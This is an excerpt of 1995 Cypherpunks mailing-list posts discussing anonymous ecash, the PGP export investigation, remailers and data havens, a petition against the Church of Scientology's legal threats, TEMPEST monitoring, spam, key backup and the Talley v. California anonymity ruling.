The interest income will be minimal. By definition the assets of the bank will be low risk, and therefore low return. It is also likely that the bulk of the ecash will be outstanding for a relatively short time (see the mpeg you want, buy the ecash, buy the mpeg; the seller receives the ecash and converts it, or invests it in an anonymous corporation who converts it), perhaps only overnight.

And fees will discourage the use of ecash. The higher the fees, the less the prospect of anonymity will appeal to the person on the street (or is that the person on the information superhighway?). A certain amount of legitimate use would do wonders to smooth the path of the crypteconomy. It is just too easy to ban (or anathematise) the whole system if *every* edollar comes from the four horsemen of the cryptocalypse.

2.3 Implications for the real economy

a) Response of regulatory authorities

The wholesale interpenetration of the real and digital economies that anonymous corporations (and similar structures) allow provides a mechanism whereby the ability of the state to control individuals is lessened. As edollars control real assets, edollars too become real, and the anonymous e-economy and the real economy merge. [Or, perhaps, since the real economy will be bigger than the e-economy, the former *absorbs* the latter.] And once this merger has taken place, it will be too late for the state to act.
The state then, will tend to fear loss of control, and, as a distinct subset of that, loss of revenue through wholesale tax avoidance.

The tax problem is probably the easiest to solve. Instead of taxing the recipients of income, the sources of that income can be taxed (eg withholding taxes on dividends and e-dividends), and the ultimate expenditure of that income can be taxed (consumption taxes). This may seem like a big change, but in the history of taxation (which is just the history of bullying) a universal income tax is very recent. And the change is, after all, just one of emphasis.

The general response of the state (egged on by the establishment) to the prospect of waning control has been discussed at length by this group, as has the difficulty of operating in the financial products marketplace. I merely mention the possibility that the SEC will refuse any scheme that seeks to issue readily convertible anonymous securities, on the grounds that it will make the detection of securities offences (such as insider trading and stock parking and a million other technical evils) too difficult.

3 Where to from here?

Cypherpunks write code. It would be nice to develop the bank-in-a-box that led to a thousand guerilla ebanks springing up around the world (like so many points of light in a presidential speech). It may not be that easy. But the legal and financial systems are still systems, and they can be hacked (although they tend to fight back -- forensic black ice...). Demonstrate the structures that make ecash a useful tool for solving real world problems (like having to pay tax, or signalling one's moves to the market), and the crypto-meme could spread to the arch-hackers of Wall St.

And evolving a modest ebank/anon-corp structure ('International Postage, Inc'?) might be a way to sneak under the wire of the regulators: no need to look too hard at some hobby project of a bunch of propellor heads, after all.
Some home cooked legal documents, a bit of form filling and Hey Presto -- real money to keep remailers and start data havens really going. And when we launch the first CyP anonMutual Fund...

Anyway, I'll wait for the feedback and see if it's worth (in the moral/political sense) looking at this stuff further. The box the bank comes in might be filled with forms.

[BTW -- TINLA]

From rogaski at phobos.lib.iup.edu Tue Jan 17 22:23:59 1995
From: rogaski at phobos.lib.iup.edu (Mark Rogaski)
Date: Tue, 17 Jan 95 22:23:59 PST
Subject: EE Times on PRZ
In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com>
Message-ID: <199501180623.BAA02464@phobos.lib.iup.edu>

-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Hal:
:
: Another interesting quote: "Zimmermann is not in danger of being indicted
: for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
: considering charging him for making PGP available in such a manner that
: it could be exported by a third party." What the hell is this? Can
: anyone point to the statute they may be referring to here? This seems
: awfully broad.
:

In a related story:

The U.S. attorney's office is also considering charging GM, Ford, and Chrysler for making automobiles available in such a manner that people could run someone over and leave the scene of the accident. :)

- -----
Doc doc at phobos.lib.iup.edu
aka Mark Rogaski http://www.lib.iup.edu/~rogaski/
Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer...
[finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]

From shamrock at netcom.com Tue Jan 17 23:24:16 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 17 Jan 95 23:24:16 PST
Subject: remailer security
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 8:50 PM 1/17/95, Mats Bergstrom wrote:

>There are ways of
>multiple chaining for the lazy, though: C2 lets you pick the chained
>sites by clicking on a web-page (but does it encrypt??).

No it doesn't. Which dramatically reduces its usefulness. There should be some way to add encryption envelopes to the CGI script. Premail?

- --Lucky

-- Lucky Green PGP encrypted mail preferred.

From tcmay at netcom.com Tue Jan 17 23:30:20 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Tue, 17 Jan 95 23:30:20 PST
Subject: Known data havens for pirates? Doubtful
In-Reply-To:
Message-ID: <199501180700.XAA14684@netcom2.netcom.com>

The comments about data havens have been interesting to read. Being the analytic-retentive type, I like to view things as tables and graphs, of such things as: who knows location (nobody, some, everybody) vs. types of data supported, for example. But I won't make such a table here, now.

[Note on my responses. Netcom is not accepting mail connections, so Cypherpunk mail basically doesn't arrive from the early morning to very late in the evening.
This has to do with toad not using "MX mail records," as near as we could figure out. Please don't send suggestions, as I can't get either toad or Netcom changed. I merely point this out to explain why I basically am out of the debate during the day. The information highway is becoming a dirt road.] I mainly agree with Rishab's point: the idea of a known, fixed location that carries Infocalypse material is deeply flawed. Data havens just won't be in known locations, at least not primarily. While I found Bruce Sterling's "data havens" in the Caribbean, Africa, and Asia interesting and provocative, they made no sense as viable, stable entities. No site which is _known_ to be a Warez site, a bootleg Nazi medical data site, a copyright violation haven, etc., will last for long. Whether knocked out as a result of a U.N. Resolution (infinitely easier than zapping Saddam), or sabotaged the way the French SDECE hit the "Rainbow Warrior," or merely subverted at ground level, the site cannot last. "The Center cannot hold." Fortunately, there is no reason for data havens to be in fixed locations. Or in traceable, identifiable locations. My BlackNet thought experiment was much more than a mere Gedanken experiment: as many of you learned, it was/is a real key, and 2-way communication has happened. Of course, you mostly all know I was the instigator (and those who don't haven't followed the debate and/or haven't read the Cyphernomicon section on BlackNet). rishab at dxm.ernet.in wrote: > I suppose you _are_ aware that the US has threatened China with punitive > duties on $100 BILLION dollars worth of trade, and that China has started > holding some show trials (without shutting down its state-owned CD-piracy > factories). It's not going to be easy to find a country more willing and > able to ignore international copyright law (Berne Convention etc) than China; > however, despite howls of protest even China is likely to knuckle down > eventually. 
What may be likely is distributed piracy markets, such as
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> described in Tim's BlackNet spoof.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Yes, this is the way to go. The data havens have a location that is a public key in cyberspace. Think of it as one entity placing an anonymous, untraceable classified ad in a newspaper, readable by many, and others placing ads in response. A two-way communication channel is thus opened up, without regard for the physical location of each, the nature of the communication, the data to be transferred, etc.

All of that is just detail.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From lmccarth at ducie.cs.umass.edu Wed Jan 18 00:00:22 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Wed, 18 Jan 95 00:00:22 PST
Subject: EE Times on PRZ
Message-ID: <199501180805.DAA18028@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Hal quotes the 1/16/95 EE Times:
> "Zimmermann is not in danger of being indicted
> for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
> considering charging him for making PGP available in such a manner that
> it could be exported by a third party."

This is very odd indeed. It reminds me of the "like-a-book" shrink-wrap software license agreements. Did they expect PRZ to run PGP solely on a single computer at home, and allow house guests to use it ?
Copies of a piece of software can obviously be handled in any fashion by their possessors. I can't conceive of a way to make software available without distributing copies, other than allowing global execute permission (but not read permission) for a copy running on an *ahem* "unhackable" server. I find it difficult to believe, however, that arms export control statutes written for munitions hardware mandate this extreme restriction on access. Such laws would turn the export-controlled section of a gun store into an analogue of the reference section of a library -- "you can use it here, but you can't check it out". People using strong crypto remotely are forced to trust the remote crypto server to some extent, which tends to defeat the whole purpose of the exercise. It also starts to sound like a model for GAK.... :[ Anyone have an email address for someone at EE Times ? -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From skaplin at mirage.skypoint.com Wed Jan 18 00:43:41 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 18 Jan 95 00:43:41 PST Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I thought this was topical and VERY much of interest here. Sam - -------- Forwarded message -------- Newsgroups: alt.2600,alt.activism,alt.atheism,alt.censorship,alt.clearing.technology,alt.conspiracy, Date: Tue, 17 Jan 1995 15:23:44 GMT From: noring at netcom.com (Jon Noring) Subject: --> A Net-Petition to the Church of Scientology, Please Read [Hurry! Signature tallying for this petition EXPIRES February 6, 1995! Be sure to send your signature to cos-petition at netcom.com -- see the instructions after the petition statement. The petition statement begins 68 lines down from here.] Following this short introductory section is the petition statement to the Church of Scientology and affiliated organizations regarding their recent legal actions which have very serious ramifications for freedom of expression on Usenet and the Internet. It is somewhat long, but the length is necessary to give you sufficient information to make an informed decision. I want to stress that this petition is NOT focused on the beliefs or practices of the Church of Scientology. Rather, it is focused on their recent legal action, and this petition demands that they reconsider these actions for the good of everyone, including themselves.
It should also be made *very clear* that none of us should ever condone or support any action which would censor or inhibit Scientology supporters from being able to express their views and opinions on Usenet, the Internet, and all other electronic forums, provided they do so in accordance with accepted netiquette, as all of us should.

I encourage you to read the petition statement carefully, and if you agree with all three demands (given near the end of the statement), to then "sign" it via Internet e-mail using the instructions which follow the statement. Do follow EXACTLY the directions on how to "sign"; they are not difficult.

Note that only those with valid Internet-accessible e-mail addresses can sign this petition. Fortunately, nearly all on-line services, such as CompuServe, and many BBS, do offer Internet e-mail access, so just about anybody who is electronically hooked up to some network in the world can sign this petition. If you are not sure what your Internet e-mail address is, ask your site's sysadmin/sysop for assistance.

Please do upload this petition statement as soon as possible to any BBS and on-line service in your area. If you have access to one of the major national on-line services such as CompuServe, Prodigy, AOL, etc., do try to upload it there. We are trying to get at least 5000 signatures. Even more signatures are entirely possible if we each put in a little effort to inform others, such as friends and coworkers, about the importance of this petition to electronic freedom of expression.

I plan to make the signatures publicly available on or shortly after February 7, 1995, and will also submit them to the Church of Scientology as well as the newsmedia.

Important Note: Because of the unusual sensitivity of this petition, I will not submit nor reveal the e-mail signatures IF the total number of validated signatures is less than 1000.
This offer is made for those who would feel "exposed" if their name appears on a list with a small number of signatures. I fully expect to surpass 1000 signatures in one or two days! In addition, unlike past net-petitions, providing one's full name in addition to one's e-mail address will be optional. However, I highly encourage you to be brave and include your full name, as all petitions are traditionally considered more "binding" if real names are used. I will tally the number of signatures with and without full names when the petition drive ends February 6, 1995. Thank you for your signature! Let's all do our part to keep all electronic networks free and open for everybody. Jon Noring (Disclaimer: Nothing written in this petition transmittal should be construed as legal advice. If you need legal assistance or advice concerning any of the issues brought up in this document, contact a qualified attorney.) **************** Beginning of Petition Statement ******************** TO: The Church of Scientology, The Religious Technology Center, Bridge Publications, Inc., Office of Special Affairs, and all other affiliated organizations, divisions and corporations of the Church of Scientology We, the undersigned, are disturbed by your recent legal attempts to stifle the free flow of information on the Internet and Usenet. Specifically, you have 1) threatened legal action against several automated anonymous remailers unless they filter out *all* e-mail targeted to the legitimate Usenet newsgroups alt.religion.scientology (a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all points of view about Scientology, both pro and con, are welcome, and 2) demanded and actually attempted the removal of a.r.s. in gross defiance of accepted Usenet practice and netiquette. Concerning 1), since nearly all (if not all) of the e-mail sent to a.r.s. and a.c.t. 
via the remailers is legitimate and originates from individuals who sincerely believe they need to post anonymously because of the nature of discussion, your demand, if implemented, would prevent these individuals from freely expressing their views in the proper forum. Freedom of expression is internationally recognized as one of the most important and sacred of basic human rights, and your demands fly in the face of this recognition. Your second demand, removing a.r.s., would go even further in inhibiting freedom of expression on all electronic networks. It is a *very* serious matter to attempt to remove forums of free expression. Your primary argument for issuing these legal threats, according to your statements, are that some people (the "perpetrators") have knowingly posted *alleged* (meaning not yet demonstrated in a court of law) Church of Scientology copyrighted and trade secret material to a.r.s. and a.c.t., sometimes using the anonymous remailers as the carrier (because of the common carrier-like nature of anonymous remailers, the administrators of the remailers have no knowledge of such activity taking place). Though we do not condone making copyrighted material available on any electronic network without the permission of the copyright holder, your specific legal threats are short-sighted, perceived to be mean-spirited, ineffective, and are on tenuous legal grounds because 1) It won't stop those who are determined to make available alleged copyrighted materials on electronic networks. They will find other avenues on the electronic networks to do so. Only prosecuting the actual perpetrators will deter this alleged illegal activity. 
2) Your demands, if met, will have the effect of leading to significant stifling of free speech and the exchange of information on all electronic networks which, if not illegal in some jurisdictions, goes against all accepted conventions of a free and open society, 3) You have not stated, nor is there any indication, that you intend to work in a cooperative manner with legitimate law-enforcement agencies, the courts, and/or the Internet to locate and prosecute the perpetrators of the *alleged* copyright violations in the countries they originated. Thus, your threats are being construed, rightly or wrongly, by most on the electronic networks as an attempt to stifle free discussion on Scientology rather than trying to locate and prosecute the perpetrators of the *alleged* copyright and trade secret violations. With respect to the attempted removal of the newsgroup a.r.s., you also stated that the word 'scientology' is trademarked and thus the name a.r.s. infringes on such trademark. This is appallingly ludicrous based on past case law of similar situations, as well as your implicit acknowledgement of the legitimacy of a.r.s. by allowing Church of Scientology approved information to be posted to it by your supporters, and possibly with your knowledge and/or approval, ever since it was created July 1991, almost 3.5 years ago. Therefore, we, the undersigned, make the following demands. 1) Regarding your charges of copyright violation over electronic networks: You will cease all legal action, now and in the future, against any person, company, organization, etc., associated or affiliated in any way with all electronic networks, including the Internet, except that action which is necessary to locate and prosecute the perpetrators (as previously defined) of alleged copyright and trade secret violations, and other activity in violation of law, and *only* in full cooperation with legitimate law-enforcement agencies and/or the courts. 
2) Regarding your trademark challenge of the Usenet newsgroup alt.religion.scientology: You will cease all legal action, now and in the future, to remove any Usenet newsgroup, BBS forum, mailing list or other similar forum of public exchange of information over any electronic network, or to inhibit in any way the flow of information to and from these forums. This includes, for example, ceasing all legal action demanding a) the removal of the Usenet newsgroup alt.religion.scientology and b) that anonymous remailers add filters as previously described. 3) You will publicly and officially state a) That you support the existence of free and open forums on all electronic networks to discuss Scientology from all perspectives and points of view (which includes yours), and b) That you do not support nor condone attempts by any entity to electronically censor, remove, obstruct, or tamper with any electronic communication except when allowed by a valid court order. If you outright reject or refuse to even discuss these demands in a good faith manner on Usenet, we have no other option but to consider such rejection or refusal to even discuss to be an act of hostility by the Church of Scientology towards the users of all electronic networks and forums, including the Internet. We are certain you do not want this, and we do not want it either, so we offer to work with you any way we can with regard to any legitimate demands you may have concerning alleged copyright violation(s) and other illegal activity. However, any attempts by you of any kind to tamper or in any manner restrict the free flow of information (other than that *specifically* restricted by law -- and *only* that) on any electronic network is totally unacceptable and will not be tolerated for the reasons stated above. 
Signed, ******************* End of Petition Statement *********************** ====================================== Instructions for Signing This Petition ====================================== It must first be noted that this is a petition, not a vote. By "signing" it you agree with *all* the demands of the petition statement. If you do not agree with all the demands, then your only recourse is to not sign it. In addition, all e-mail signatures will be submitted to the Church of Scientology as well as the newsmedia provided more than 1000 validated signatures are obtained. Including your full name is optional, but very highly encouraged as that would add to the effectiveness of the petition. Signing via an anonymous remailer is discouraged, but not forbidden, as an attempt will be made to separately tally signatures from anonymous remailers. Signing this petition is not hard, but to make sure your signature is not lost or miscounted, please follow these directions exactly: 1) Prepare an e-mail message. In the main body (NOT the Subject line) of your e-mail include the ONE-LINE statement: SIGNED You need not include the "<" and ">" characters. 'SIGNED' should be capitalized. As stated above, your full name is optional, but highly recommended. If you do supply your name, please don't use a pseudonym or nickname, or your first name -- it's better to just leave it blank if it's not your full and real name. *************************************** Example: My e-mail signature would be: SIGNED noring at netcom.com Jon E. Noring *************************************** 2) Please DON'T include a copy of this petition, nor any other text, in your e-mail message. If you have comments to make, send e-mail to me personally, and NOT to the special petition e-mail signature address. 
3) Send your e-mail message containing your signature to the following Internet e-mail address and NOT to me: =========================== cos-petition at netcom.com =========================== 4) Within a few days of receipt of your signature, an automated acknowledgment will be e-mailed to you for e-mail address verification purposes. You do not need to respond or reply to this acknowledgement when you receive it. Thank you for signing this petition! Jon Noring (p.s., send your signature to cos-petition at netcom.com) - -- OmniMedia | The Electronic Bookstore. Come in and browse! Two 1312 Carlton Place | locations: ftp.netcom.com /pub/Om/OmniMedia/books Livermore, CA 94550 | and ftp.awa.com /pub/softlock/pc/products/OmniMedia 510-294-8153 | E-book publishing service follows NWU recommendations. - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. 
==============================================================================
A skydiving school is one in which you MUST be a dropout to graduate

From rrothenb at libws4.ic.sunysb.edu Wed Jan 18 03:27:49 1995
From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg)
Date: Wed, 18 Jan 95 03:27:49 PST
Subject: Known data havens for pirates? Doubtful
In-Reply-To: <199501180700.XAA14684@netcom2.netcom.com>
Message-ID: <9501181127.AA24624@toad.com>

>
> The comments about data havens have been interesting to read. Being
[ .. ]
> Yes, this is the way to go. The data havens have a location that is a
> public key in cyberspace. Think of it as one entity placing an
> anonymous, untraceable classified ad in a newspaper, readable by many,
> and others placing ads in response. A two-way communication channel is
> thus opened up, without regard for the physical location of each, the
> nature of the communication, the data to be transferred, etc.
>
> All of that is just detail.

Hmmm... then why use a data haven at all? Split the file into small pieces, encrypt each and post each piece in a newsgroup (the pieces may even be posted as small garbles of data in sigs?). When you need to recover the file check sites which archive those newsgroups.

Just a thought. It's probably quite doable for small files.

Another idea: use encryption/secret sharing combined with steganography and upload copies of the said files to various ftp-sites or BBS's.
(It may be that this is more secure than data havens, since few SysAdmins would bother checking for steganographically hidden files...)

>
> --Tim May

Rob

From djw at pentagon.io.com Wed Jan 18 05:22:05 1995
From: djw at pentagon.io.com (Duncan)
Date: Wed, 18 Jan 95 05:22:05 PST
Subject: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <9501172240.AA05908@warp.mcom.com>
Message-ID: <199501181321.HAA04672@pentagon.io.com>

>> Marc, isn't it possible (legally) to deliver products with a replaceable
>> encryption library (dll). Delivery with a 40-bit key DLL. The user has
>> the option to install a dll with a different keysize. Somewhat like
>> winsock....
>
>
>Actually, it's probably worse than you think:
>
>There are govt's out there that won't let you import code that is
>"encryption ready". You must prove that your software is tamper proof
>before it can be imported, and tamper proofing means that you can't
>bolt on security. Also, I believe the export laws disallow "plug in"
>security in the US...
>
>The crypto legal world sucks.

Could you clarify the export restriction on "plug and play" encryption ready products? I am about to embark on a project that I want to be distributed freely that would be designed around a generic encryption interface that I would wrap around a real encryption core such as PGP, etc. I wanted to include a BS encryption in the freely distributable package to prevent export woes.

The project is in design stages now and I don't need this additional headache.

djw
-------------------------------------------------------------
Duncan J Watson djw at io.com
"Sig Quote goes here" duncan at hasp.com

From joelm at eskimo.com Wed Jan 18 07:21:06 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Wed, 18 Jan 95 07:21:06 PST
Subject: TEMPEST
Message-ID: <199501181520.AB24570@mail.eskimo.com>

I know, it's a little bit outside the normal realm of discussion, but...
The Cyphernomicon talks about a proposed, early Cypherpunk project that dealt with TEMPEST/VanEck monitoring. Did anyone carry this out beyond the idea stage? All I ever seem to see is "theory" and "hear-say" on this topic (and the original VanEck article appears dated and incomplete). I noticed the Consumertronics (John Williams in Alamogordo, New Mexico) catalog has an assembled device that will work with EGA to SVGA monitors. $3,995 seems a bit pricey though (or is it). Has anyone had dealings with Consumertronics in the past? Replies directly back to me if this is a waste of bandwidth for the rest of the list. Thanks... Joel McNamara joelm at eskimo.com - finger for PGP key From jya at pipeline.com Wed Jan 18 07:30:26 1995 From: jya at pipeline.com (John Young) Date: Wed, 18 Jan 95 07:30:26 PST Subject: NYT on Prodigy Web and Checkfree Suit Message-ID: <199501181529.KAA07432@pipe2.pipeline.com> Peter Lewis writes today on Prodigy's new offering of World Wide Web service. For email copy send blank message with subject: PRO_www Saul Hansell writes today on Checkfree's new patent and suit against National Payment Clearing House, a subsidiary of Intuit. For email copy send blank message with subject: CHK_sue For twin use subject: PRO_CHK From eric at remailer.net Wed Jan 18 07:44:09 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 07:44:09 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <199501181543.HAA08161@largo.remailer.net> From: Michael Handler [automatically split and redistribute] If the authorities attempt to indict you for possessing illegal information / kiddie porn / whatnot, they have to prove that you interfered with the automatic redistribution process and examined the contents of the submission. If you in fact did not look at the submission, they would have a difficult time doing so. This is exactly the right kind of approach, I think. 
It's more expensive to implement than a readable-reject filter, but then I expect a continuum of services. The key legal point is "interfered with the automatic redistribution process". If an operator can point to those fixed properties of a system which keep the operator ignorant, an opponent trying to prove otherwise will have a difficult time. Eric From eric at remailer.net Wed Jan 18 07:54:12 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 07:54:12 PST Subject: (none) In-Reply-To: Message-ID: <199501181554.HAA08177@largo.remailer.net> From: Brian Beattie I disagree, one can use e-mail to steal. E-mail consumes resources, resources for which the sender may have no right to use. It's not theft if there's no direct benefit to the actor. It does consume resources, there's no argument about that. Note, however, that the scope of any such resource use is with the message as a bit sequence; no meaning or interpretation of the content is even relevant. That is, the resource use does not relate to the email as communication, merely as a technical operation. The question remains whether such resource use can ever be considered unauthorized. Certainly it's impolite; that's not at issue. I argue that if you hook your machine up to the Internet, you've implicitly authorized people to send you packets -- as many as they want and of whatever nature as they want. No service provision I've ever seen gives any recourse to the end user against the provider for "bad" packets. I also think this is the one great flaw in the design of the Internet; namely, that the sender has all the control over what packets flow over the net. A receiver can ask for a slowdown or cessation, but there's no obligation to do so. This will be, if anything, the limiting factor in scalability of the internet. Eric From perry at imsi.com Wed Jan 18 08:03:30 1995 From: perry at imsi.com (Perry E.
Metzger) Date: Wed, 18 Jan 95 08:03:30 PST Subject: (none) In-Reply-To: <199501181554.HAA08177@largo.remailer.net> Message-ID: <9501181603.AA01635@snark.imsi.com> Eric Hughes says: > I argue that if you hook your machine up to the Internet, you've > implicitly authorized people to send you packets -- as many as they > want and of whatever nature as they want. No service provision I've > ever seen gives any recourse to the end user against the provider for > "bad" packets. Be that as it may, people HAVE been kicked off for mischief like forging routing packets -- and if someone started hosing me down with any one of several really nasty packet based attacks I'm familiar with I would expect action to be taken against them. Remember that degree is important in such instances. You are allowed to shine a flashlight at your neighbor's house -- you aren't allowed to shine a fifty megawatt laser. Degree counts. > I also think this is the one great flaw in the design of the Internet; > namely, that the sender has all the control over what packets flow > over the net. A receiver can ask for a slowdown or cessation, but > there's no obligation to do so. This will be, if anything, the > limiting factor in scalability of the internet. I doubt it. It really hasn't proved to be an actual problem thus far. If anything, the limiting factor on scalability is the fact that the net has no locality of reference, which is making routing design harder and harder. Routing is currently THE big unsolved problem on the net -- something outsiders to the IETF rarely suspect, because the engineers have been faking it so well for so long. Unfortunately, all the good solutions to the routing problem are mathematically intractable -- and the practical ones are leading to bad potential long term problems... 
Perry From eric at remailer.net Wed Jan 18 08:07:43 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 08:07:43 PST Subject: (none) In-Reply-To: <9501172027.AA24378@firefly.prairienet.org> Message-ID: <199501181607.IAA08201@largo.remailer.net> From: jalicqui at prairienet.org (Jeff Licquia) I'm sure that when your hypothetical remailer comes up and I decide to spam you with your own words (now I wouldn't do that, now would I? ;-), your sysadmin will be comforted by knowing that it's only ones and zeros filling his hard disk. Why sendmail doesn't have anti-spam protection at this point is beyond me. Denial of email service to one user should not deny service to all others. I consider broken any email system that crashes a machine because of a disk partition filling. When your email provider gave you an account, was there an agreement as to how much mail you could receive? If there wasn't, that provider has no good reason to complain if you receive as much email as possible. Merely because someone else decided to send it to you does not relieve a provider who has agreed to deliver all mail of that obligation. Moral: If you operate an email service, don't offer unlimited fixed price email. In the real world, however, there will always be problems with "acceptable use" and "abuse", along with the additional problems with establishing policy and so on. "Acceptable use" is shorthand for "It's a little rickety, please don't play hard." That is, the technical means to limit the consequences of abuse were not developed, because everyone was willing to play nice. This doesn't scale, and it will have to be fixed before everyone will put their home computer directly on the net. Eric From eric at remailer.net Wed Jan 18 08:13:26 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 08:13:26 PST Subject: Key backup (was: How do I know . ..) In-Reply-To: <199501180601.BAA16566@bb.hks.net> Message-ID: <199501181613.IAA08209@largo.remailer.net> From: "Dr.
D.C. Williams" The "spread spectrum" approach might well be indicated for some life-or-death key security matters, but the vast majority of PGP users probably don't need or want to play Spy vs. Spy with their friends to back up keys. You use your friends now because off-site storage facilities are not yet available. The software for distributed remote backup has yet to make this operation transparent. I recognize that you can't just leave your private keyring lying around [physical storage mentioned] I suspect that most private keys in the future will be held in PCMCIA cards (initially) and then their smaller replacements. Backing up a private key to these allows use of a safe deposit box. If it's still "passphrase-protected", an attacker would a) have to know what to look for For scalability, most people will use some standard method, whatever it is. This limits the search space of an opponent. Eric From lethin at ai.mit.edu Wed Jan 18 08:47:35 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Wed, 18 Jan 95 08:47:35 PST Subject: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity] Message-ID: <9501181647.AA13819@toast> Return-Path: Resent-Date: Tue, 17 Jan 1995 18:00:48 -0800 Date: Tue, 17 Jan 1995 18:00:02 -0800 From: Phil Agre To: rre at weber.ucsd.edu Subject: Supreme Court decision on anonymity Resent-From: rre at weber.ucsd.edu Reply-To: rre-maintainers at weber.ucsd.edu X-Url: http://communication.ucsd.edu/pagre/rre.html X-Mailing-List: archive/latest/534 X-Loop: rre at weber.ucsd.edu Precedence: list Resent-Sender: rre-request at weber.ucsd.edu Dave Banisar from the Electronic Privacy Information Center sent me the enclosed text of the US Supreme Court's decision denying the constitutionality of laws banning anonymous leaflets. This decision has an obvious relevance to current debates about regulating anonymous messages on the Internet. Date: Tue, 17 Jan 1995 16:17:44 EST From: Dave Banisar Subject: anonymity [...] TALLEY v.
CALIFORNIA SUPREME COURT OF THE UNITED STATES 362 U.S. 60 January 13-14, 1960, Argued March 7, 1960, Decided Certiorari to the Appellate Department of the Superior Court of California, Los Angeles County. 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed. A. L. Wirin and Hugh R. Manes argued the cause for petitioner. With them on the brief was Fred Okrand. Philip E. Grey argued the cause for respondent. With him on the brief was Roger Arnebergh. Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed a brief for the American Jewish Congress, as amicus curiae, urging reversal. Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan, Whittaker, Stewart MR. JUSTICE BLACK delivered the opinion of the Court. The question presented here is whether the provisions of a Los Angeles City ordinance restricting the distribution of handbills "abridge the freedom of speech and of the press secured against state invasion by the Fourteenth Amendment of the Constitution." n1 The ordinance, @ 28.06 of the Municipal Code of the City of Los Angeles, provides: "No person shall distribute any hand-bill in any place under any circumstances, which does not have printed on the cover, or the face thereof, the name and address of the following: "(a) The person who printed, wrote, compiled or manufactured the same. "(b) The person who caused the same to be distributed; provided, however, that in the case of a fictitious person or club, in addition to such fictitious name, the true names and addresses of the owners, managers or agents of the person sponsoring said hand-bill shall also appear thereon." The petitioner was arrested and tried in a Los Angeles Municipal Court for violating this ordinance. It was stipulated that the petitioner had distributed handbills in Los Angeles, and two of them were presented in evidence. Each had printed on it the following: National Consumers Mobilization, Box 6533, Los Angeles 55, Calif. PLeasant 9-1576. 
The handbills urged readers to help the organization carry on a boycott against certain merchants and businessmen, whose names were given, on the ground that, as one set of handbills said, they carried products of "manufacturers who will not offer equal employment opportunities to Negroes, Mexicans, and Orientals." There also appeared a blank, which, if signed, would request enrollment of the signer as a "member of National Consumers Mobilization," and which was preceded by a statement that "I believe that every man should have an equal opportunity for employment no matter what his race, religion, or place of birth." The Municipal Court held that the information printed on the handbills did not meet the requirements of the ordinance, found the petitioner guilty as charged, and fined him $ 10. The Appellate Department of the Superior Court of the County of Los Angeles affirmed the conviction, rejecting petitioner's contention, timely made in both state courts, that the ordinance invaded his freedom of speech and press in violation of the Fourteenth and First Amendments to the Federal Constitution. n2 172 Cal. App. 2d Supp. 797, 332 P. 2d 447. Since this was the highest state court available to petitioner, we granted certiorari to consider this constitutional contention. 360 U.S. 928. In Lovell v. Griffin, 303 U.S. 444, we held void on its face an ordinance that comprehensively forbade any distribution of literature at any time or place in Griffin, Georgia, without a license. Pamphlets and leaflets, it was pointed out, "have been historic weapons in the defense of liberty" n3 and enforcement of the Griffin ordinance "would restore the system of license and censorship in its baldest form." Id., at 452. A year later we had before us four ordinances each forbidding distribution of leaflets -- one in Irvington, New Jersey, one in Los Angeles, California, one in Milwaukee, Wisconsin, and one in Worcester, Massachusetts. Schneider v. State, 308 U.S. 147. 
